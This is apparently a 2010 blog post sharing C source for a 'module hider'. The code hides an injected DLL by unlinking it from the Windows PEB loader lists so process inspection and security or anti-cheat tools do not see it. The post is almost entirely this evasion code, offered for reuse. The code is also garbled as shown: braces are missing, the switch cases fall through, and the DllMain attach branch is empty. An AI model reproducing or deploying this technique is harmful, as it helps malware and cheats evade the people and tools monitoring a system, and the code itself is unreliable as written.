
On domingo, 5 de septiembre de 2010 0 comentarios

Code snip

// Project : HelioS-Module-Hider
// Version : 1.0
// Coder : [ELF]HelioS
// Site :

// What:
// Hide a Dynamic Link Library from the module list on NT systems

// References:
// Tetsuo (
// NTinternals (
// Phrack Inc. (

#include "ModuleHider.h"

void HideModuleEx (HINSTANCE hModule, ELIST eList)
PPEB Peb = (PPEB)0x7ffdf000; // Static pointer to the Process Environment Block
char szPath[MAX_PATH];

GetModuleFileNameA(hModule, szPath, MAX_PATH);

if (Peb && Peb->LoaderData && Peb->LoaderData->Initialized)
PLIST_ENTRY pListHead = NULL, pListPtr = NULL;
DWORD dOffset = 0;

switch (eList) // There are 3 module lists with different offsets
case LIST_LoadOrder:
pListHead = pListPtr = &(Peb->LoaderData->InLoadOrderModuleList);
dOffset = 0x24;

case LIST_MemoryOrder:
pListHead = pListPtr = &(Peb->LoaderData->InMemoryOrderModuleList);
dOffset = 0x1C;

case LIST_InitOrder:
pListHead = pListPtr = &(Peb->LoaderData->InInitializationOrderModuleList);
dOffset = 0x14;

if (pListHead && pListPtr)
// LIST_ENTRY is a double linked list, so we need to loop thru 2 lists

do // Loop thru Flink
char name[MAX_PATH];
wsprintfA(name, "%S", ((PUNICODE_STRING)((PCHAR)pListPtr->Flink + dOffset))->Buffer);

if (!stricmp(name, szPath)) // We found our module, so lets hide it
pListPtr->Flink = pListPtr->Flink->Flink;

pListPtr = pListPtr->Flink;

} while (pListPtr->Flink != pListHead->Flink);

do // Loop thru Blink
char name[MAX_PATH];
wsprintfA(name, "%S", ((PUNICODE_STRING)((PCHAR)pListPtr->Blink + dOffset))->Buffer);

if (!stricmp(name, szPath)) // We found our module, so lets hide it
pListPtr->Blink = pListPtr->Blink->Blink;

pListPtr = pListPtr->Blink;

} while (pListPtr->Blink != pListHead->Blink);

void HideModule (HINSTANCE hModule)
HideModuleEx(hModule, LIST_LoadOrder);
HideModuleEx(hModule, LIST_MemoryOrder);
HideModuleEx(hModule, LIST_InitOrder);

BOOL WINAPI DllMain (HINSTANCE hModule, DWORD dwReason, LPVOID lpvReserved)
if (dwReason == DLL_PROCESS_ATTACH)

return TRUE;

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